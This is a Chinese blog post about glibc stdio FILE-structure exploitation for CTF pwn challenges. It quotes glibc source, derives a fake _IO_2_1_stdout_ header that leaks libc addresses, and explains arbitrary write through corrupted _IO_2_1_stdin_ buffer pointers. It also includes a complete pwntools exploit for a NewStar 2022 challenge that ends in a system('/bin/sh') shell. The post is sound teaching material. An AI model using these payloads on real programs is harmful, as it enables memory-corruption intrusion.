标准IO与任意读写
标准IO与任意读写
君已尘满面,污泥满身,好个白发迷途人。
想不到吧,我这个码农竟然也是个树粉
标准IO相关基础知识
标准输出
基础不牢地动山摇,建议大家都好好沉下心来看看源码。
printf,puts,会用bss段刚开头处的stdout这个指针,去找到_IO_2_1_stdout_这个FILE结构。然后它们通过一系列操作后,最后会调用_IO_2_1_stdout_这个结构体的vtable指向的虚表中的_IO_XSPUTN(正常是_IO_file_jumps中的_IO_file_xsputn)
在输出中,FILE结构在flag后面的八个指针(_IO_buf_base等,你在源码中IO_FILE结构里面可以找到,为了方便交流,我在下文省略指针名前缀“_IO_”),和输入输出时关系重大,它们决定了从哪取数据,把数据放在哪,缓冲在哪等问题。
关于缓冲
关于这缓冲是个什么玩意,建议看看这些文章:
linux IO_FILE 利用
标准输入
类似地,scanf之类函数也是通过stdin找_IO_2_1_stdin_,然后在vtable(_IO_file_jumps)里面找_IO_XSGETN(_IO_file_xsgetn)
当然,也有诸如fwrite,fscanf等不走标准输入输出的,这些函数最后都是走对应FILE的_IO_XSPUTN和_IO_XSGETN,只不过传的FILE指针不是标准输入输出的指针罢了。
两个特例
注意,read和write函数不走FILE结构体。它们只要给一个文件描述符,就直接开始跑对应的系统调用了,这个过程和FILE结构无关。
本篇博客接下来,会重点讲解如何通过修改FILE中相关指针来实现内存泄漏、任意地址读等操作,对于IO机制的具体实现,不作深入剖析(也没那个本事..)
_IO_2_1_stdout_ 泄露libc地址
想实现这个效果,我们需要能控制_IO_2_1_stdout_的flag域,同时还要能干涉到write_base指针(你至少要能将低位改小一些)
个人感觉,pwn学到现在,那些技巧已经不是仅仅记结论就能满足的了。你如果想深入学习,就得吃透原理。所以,我亲爱的读者,打开你保存的glibc源码吧,我们一点一点分析相关内容。
首先,这个泄露要通过和标准输出有关的函数触发,比如puts函数。这个函数会调用_IO_file_xsgetn,直到这一步之前,程序都没有过多关注找到的这个结构体内部结构。
这个函数其实被define为了_IO_new_file_xsputn,基本上就换了个名字而已,影响不大...
源码很长,大家耐心看...
_IO_size_t
_IO_new_file_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)
{
const char *s = (const char *) data;
_IO_size_t to_do = n;
int must_flush = 0;
_IO_size_t count = 0;
if (n <= 0)
return 0;
/* This is an optimized implementation.
If the amount to be written straddles a block boundary
(or the filebuf is unbuffered), use sys_write directly. */
/* First figure out how much space is available in the buffer. */
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr;
if (count >= n)
{
const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1;
must_flush = 1;
break;
}
}
}
}
else if (f->_IO_write_end > f->_IO_write_ptr)
count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
/* Then fill the buffer. */
if (count > 0)
{
if (count > to_do)
count = to_do;
#ifdef _LIBC
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
#else
memcpy (f->_IO_write_ptr, s, count);
f->_IO_write_ptr += count;
#endif
s += count;
to_do -= count;
}
if (to_do + must_flush > 0)
{
_IO_size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
/* If nothing else has to be written we must not signal the
caller that everything has been written. */
return to_do == 0 ? EOF : n - to_do;
/* Try to maintain alignment: write a whole number of blocks. */
block_size = f->_IO_buf_end - f->_IO_buf_base;
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}
/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
}
libc_hidden_ver (_IO_new_file_xsputn, _IO_file_xsputn)
调用这个函数,传参时,f为_IO_2_1_stdout_的地址,data为要输出的数据起始位置,n为预先设定或者函数自己计算出来的输出数据长度。
我们的目的是让程序执行这一句:
if (_IO_OVERFLOW (f, EOF) == EOF)
为达到目的,我们需要避开一些不必要的分支。所幸目前到这里不会出现什么大问题,
可以看到分支中有一些和_flags有关的判断,这里顺手列一下相关的宏
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */
#define _IO_UNBUFFERED 2
#define _IO_NO_READS 4 /* Reading not allowed */
#define _IO_NO_WRITES 8 /* Writing not allowd */
#define _IO_EOF_SEEN 0x10
#define _IO_ERR_SEEN 0x20
#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */
#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/
#define _IO_IN_BACKUP 0x100
#define _IO_LINE_BUF 0x200
#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */
#define _IO_CURRENTLY_PUTTING 0x800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
#define _IO_BAD_SEEN 0x4000
#define _IO_USER_LOCK 0x8000
好了我们回到前面的源码。
稳妥起见,前面的if-else和if两个代码块,能避开则尽量避开。第一个if-else中,if条件里面后一个0x800是后面必须要设置为成立的,所以前一个0x200就尽量别碰了。而else语句中根据write_end-write_ptr计算count,由于一般来说程序被设置为了无缓冲模式,所以FILE里面write的那三个指针(base,ptr,end)都是在同一位置,且居然是指向FILE结构后方的一个地址(这一点很重要,因为以后的泄露的范围和这里的指针相关,这三个指针在libc段,里面尽是libc地址)
第二个if,由于之前让count为0,所以自然而然也绕过了。之后就会进入_IO_file_overflow函数,这个函数被define为了_IO_new_file_overflow
int
_IO_new_file_overflow (_IO_FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (__glibc_unlikely (_IO_in_backup (f)))
{
size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
_IO_free_backup_area (f);
f->_IO_read_base -= MIN (nbackup, f->_IO_read_base - f->_IO_buf_base);
f->_IO_read_ptr = f->_IO_read_base;
}
if (f->_IO_read_ptr == f->_IO_buf_end)
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
if (_IO_do_flush (f) == EOF)
return EOF;
*f->_IO_write_ptr++ = ch;
if ((f->_flags & _IO_UNBUFFERED) || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
if (_IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base) == EOF)
return EOF;
return (unsigned char) ch;
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)
目标是执行:
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
_IO_do_write会执行write系统调用,其参数和调用_IO_do_write时传入的参数相应。可以看到,这里实际会打印write_base与write_ptr之间的所有数据。
无缓冲时,_IO_2_1_stdout_的write_base与write_ptr默认指向_IO_2_1_stdout_后的一个地址,如果你讲write_base的最低位字节覆盖为\x00,那么这个范围就能包含_IO_2_1_stdout_的chain域,即泄露_IO_2_1_stdin_的地址,这样就能拿到libc基址。
但是同样,我们需要绕开一些前面的分支,确保程序能执行到这里。
_IO_NO_WRITES这个是_flags的问题,改一下就行。
后面一个大if分支,里面一些操作会覆盖我们的write相关指针,使得我们原来泄露的方案失效,因此必须绕过。条件中,write_base一般我们没必要置为0,这个条件一般恒不成立,所以搞定前一个条件为否就可以了,这个也是flag的工作,把0x800的二进制位亮起来就行。
之后进入_IO_do_write,这里是define成了_IO_new_do_write
int
_IO_new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
return (to_do == 0 || (_IO_size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)
static
_IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
_IO_size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
_IO_off64_t new_pos = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do);
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0 && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED)) ? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}
我们在这里可以看到那个系统调用:
count = _IO_SYSWRITE (fp, data, to_do);
绕过最后一点就行,前面有一个if-else分支,第二个分支因为我们难以确定原write_base地址所以往往无法避开,但是第一个条件容易满足(_flags点亮0x1000),而且第一个分支仅仅是改变了offset这个域,影响不大。所以这里可以选择走第一个分支,而避开第二个。
因此,我们对于_IO_2_1_stdout_的篡改可以总结为:
fake_file =p64(0xfbad1800)
fake_file+=p64(0)
fake_file+=p64(0)
fake_file+=p64(0)
fake_file+='\x00'
这样修改FILE头部就行了,之后触发puts,打印的第一个libc地址往往是_IO_2_1_stdin_的地址。
典型例题是newstar 2022 week4的一道IsThisHeap,BUUCTF上有这场比赛的环境,这里放上EXP,我的博客里面也有这个比赛的详细wp。
from os import system
from pwn import *
ELFpath='/home/wjc/Desktop/pwn'
libcpath='/home/wjc/Desktop/libc-2.31.so'
context.arch='amd64'
context.log_level='debug'
context.terminal=['tmux','splitw','-h']
r=process(ELFpath)
libc=ELF(libcpath)
log_result={}
def cmd(idx):
r.recvuntil('>> ')
r.sendline(str(idx));
def Add(content):
cmd(1)
r.recvuntil('Any data?')
r.sendline(content)
def Edit(idx,content):
cmd(3)
r.recvuntil('Index:')
r.sendline(str(idx))
r.recvuntil('Content:')
r.send(content)
def Show(idx):
cmd(4)
r.recvuntil('Index:')
r.sendline(str(idx))
gdb.attach(r,'b*0x400730')
fake_file =p64(0xfbad1800)
fake_file+=p64(0)*3
Edit(-8,fake_file)
libcbase=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.symbols['_IO_2_1_stdin_']
system_addr=libcbase+libc.symbols['system']
onegadget=libcbase+0xe3b04
puts_addr=libcbase+libc.symbols['puts']
write_addr=libcbase+libc.symbols['write']
log_result['libcbase']=libcbase
log_result['system']=system_addr
log_result['onegadget']=onegadget
log_result['puts_addr']=puts_addr
log_result['write_addr']=write_addr
offset=0x601EF0+8-0x6020E0
Add("/bin/sh\x00")
pay1=p64(0x601e20)+p64(0)+p64(0)+p64(puts_addr)+p64(write_addr)+p64(system_addr)
Edit(offset/8,pay1)
Show(0)
def LOGALL():
log.success("***** all result *****")
for i in log_result.items():
log.success('%-20s%s'%(i[0]+":",hex(i[1])))
LOGALL()
r.interactive()
_IO_2_1_stdin_ 实现任意写
二话不说先贴源码
_IO_size_t
_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
{
_IO_size_t want, have;
_IO_ssize_t count;
char *s = data;
want = n;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
else
{
if (have > 0)
{
#ifdef _LIBC
s = __mempcpy (s, fp->_IO_read_ptr, have);
#else
memcpy (s, fp->_IO_read_ptr, have);
s += have;
#endif
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp)) //#define _IO_in_backup(fp) ((fp)->_flags & _IO_IN_BACKUP)
{
_IO_switch_to_main_get_area (fp);
continue;
}
/* If we now want less than a buffer, underflow and repeat
the copy. Otherwise, _IO_SYSREAD directly to
the user buffer. */
if (fp->_IO_buf_base && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
{
if (__underflow (fp) == EOF)
break;
continue;
}
/* These must be set before the sysread as we might longjmp out
waiting for input. */
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* Try to maintain alignment: read a whole number of blocks. */
count = want;
if (fp->_IO_buf_base)
{
_IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}
count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;
break;
}
s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}
return n - want;
}
libc_hidden_def (_IO_file_xsgetn)
scanf等走IO_FILE结构体的函数,最终都要通过这个函数来实现。
进入函数,先从buf_base是否为0判断缓冲区是否初始化。在做好初始化的前提下,程序会判断剩余缓冲区(read_end - read_ptr)来判断缓冲是否还有剩余,如果有且足够,则尝试用缓冲中的数据去填充。
_IO_in_backup (fp)这个分支注意避开。
如果剩余缓冲数据不足以填充,则在倒完所有缓冲之后,判断缓冲区空间是否还有空余空间(buf_end-buf_base),如果缓冲区未满,则调用__underflow这个函数执行read系统调用,刷新缓冲区指针并读入数据到缓冲区。之后会回到循环起始将缓冲区数据拷贝进来。
__underflow这个函数里面会调用虚表中的_IO_UNDERFLOW,一般来说最终会进入_IO_new_file_underflow这个函数,在这里面有一个向buf_base读入数据的sys_read,如果能劫持程序至此,则可以实现任意地址任意写.
程序跳转到_IO_new_file_underflow的过程及其内部运行,又下图所示。
int
__underflow (_IO_FILE *fp)
{
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
#endif
if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
这里看到,read_ptr < read_end、_IO_in_backup (fp)这些条件,在_IO_file_xsgetn中间已经得到确保,该避开的都能避开。而_IO_have_backup (fp)要求(fp)->_IO_save_base != NULL,_IO_have_markers (fp)要求_IO_have_markers(fp) ((fp)->_markers != NULL),稍微注意一下,也没问题
进到_IO_new_file_underflow里面看看情况
int
_IO_new_file_underflow (_IO_FILE *fp)
{
_IO_ssize_t count;
#if 0
/* SysV does not make this test; take it out for compatibility */
if (fp->_flags & _IO_EOF_SEEN)
return (EOF);
#endif
if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
/* Flush all line buffered files before reading. */
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
#if 0
_IO_flush_all_linebuffered ();
#else
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (_IO_stdout);
if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF)) == (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (_IO_stdout, EOF);
_IO_release_lock (_IO_stdout);
#endif
}
_IO_switch_to_get_mode (fp);
/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_buf_base;
count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)
我们的目标语句是
count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);
(我们容易看到,这条语句执行前后,FILE中的write和read相关缓冲指针都被重新赋值了)
进入函数,老生常谈地flag检查,同时还有关于read_ptr和read_end的比对(进入函数前已经解决掉和这个问题了)和对于缓冲区是否初始化(buf_base是否为NULL)的检查
下面fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED)的分支还是能避开则避开吧,_IO_OVERFLOW (_IO_stdout, EOF)这玩意具体搞了什么你把握不住
接下来就直接sys_read了,这是我们的目的。
所以覆写思路如下
- _flags设为0xfbad1800就好,和stdout一样,好记
- read_ptr要等于read_end,全部置零干脆。
- write的三个指针也置为0吧,没啥用,反正最后都read完又刷新了,也不用担心有啥影响
- buf_base和buf_end把要写的内存段给框起来,buf_base指向起点,buf_end指向终点。
其实还有别的条件需要注意,但一般都不会出问题。